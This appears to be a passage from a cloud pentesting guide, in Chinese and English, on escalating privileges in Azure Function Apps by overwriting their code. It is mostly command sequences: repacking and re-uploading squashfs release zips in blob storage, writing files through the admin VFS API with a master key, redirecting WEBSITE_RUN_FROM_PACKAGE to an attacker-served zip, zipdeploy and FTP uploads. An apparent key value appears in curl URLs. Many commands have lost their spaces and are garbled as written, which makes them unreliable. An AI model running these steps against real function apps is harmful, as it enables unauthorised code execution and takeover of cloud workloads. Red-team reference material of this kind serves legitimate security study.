# Username is the name of the storage account# Password is the Storage Account Key# Open the connection to the file share# Change the code of the script like /site/wwwroot/function_app.pyopen"smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"
function-releases (WEBSITE_RUN_FROM_PACKAGE)
在函数应用使用的存储帐户容器的文件夹 function-releases 中,通常也会发现 zip 发布。
# List containers inside the storage account of the function appazstoragecontainerlist \--account-name <acc-name> \--output table# List files inside one containerazstoragebloblist \--account-name <acc-name> \--container-name <container-name> \--output table# Download fileazstorageblobdownload \--account-name <res-group> \--container-name scm-releases \--name scm-latest-<app-name>.zip \--file /tmp/scm-latest-<app-name>.zip## Even if it looks like the file is a .zip, it's a Squashfs filesystem# Installbrewinstallsquashfs# List contents of the filesystemunsquashfs-l"/tmp/scm-latest-<app-name>.zip"# Get all the contentsmkdir/tmp/fsunsquashfs-d/tmp/fs/tmp/scm-latest-<app-name>.zip
只要有足够的权限连接到 包含 zip 扩展文件的 blob 容器(实际上是一个 squashfs),就可以在 Function 中执行任意代码并提升权限。
# Modify code inside the script in /tmp/fs adding your code# Generate new filesystem filemksquashfs/tmp/fs/tmp/scm-latest-<app-name>.zip-b131072-noappend# Upload it to the blob storageazstorageblobupload \--account-name <storage-account> \--container-name scm-releases \--name scm-latest-<app-name>.zip \--file /tmp/scm-latest-<app-name>.zip \--overwrite
# Get "script_href" fromazrest--methodGET \--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"# Accesscurl"<script-href>?code=<master-key>"## Python example:curl"https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g=="-v
并且要更改正在执行的代码在函数中:
# Set the code to set in the function in /tmp/function_app.py## The following continues using the python examplecurl-XPUT"https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \--data-binary @/tmp/function_app.py \-H "Content-Type: application/json" \-H "If-Match: *" \-v
# Write inside /tmp/web/function_app.py the code of the functioncd/tmp/web/function_app.pyzipfunction_app.zipfunction_app.pypython3-mhttp.server# Serve it using ngrok for examplengrokhttp8000
修改函数,保留之前的参数,并在最后添加配置 WEBSITE_RUN_FROM_PACKAGE 指向包含代码的 zip 的 URL。
# This is a python example, so we will be overwritting function_app.py# Store in /tmp/body the raw python code to put in the functionazrest--methodPUT \--uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \--headers '{"Content-Type": "application/json", "If-Match": "*"}' \--body @/tmp/body
# Get settings valuescurl-u'<username>:<password>' \https://<app-name>.scm.azurewebsites.net/api/settings -v# Deploy code to the funcitonzipfunction_app.zipfunction_app.py# Your code in function_app.pycurl-u'<username>:<password>'-XPOST--data-binary"@<zip_file_path>" \https://<app-name>.scm.azurewebsites.net/api/zipdeploy
# macOS install lftpbrewinstalllftp# Connect using lftplftp-u'<username>','<password>' \ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/# Some commandsls# Listget./function_app.py-o/tmp/# Download function_app.py in /tmpput/tmp/function_app.py-o/site/wwwroot/function_app.py# Upload file and deploy it
Note that the FTP username is usually in the format <app-name>\$<app-name>.
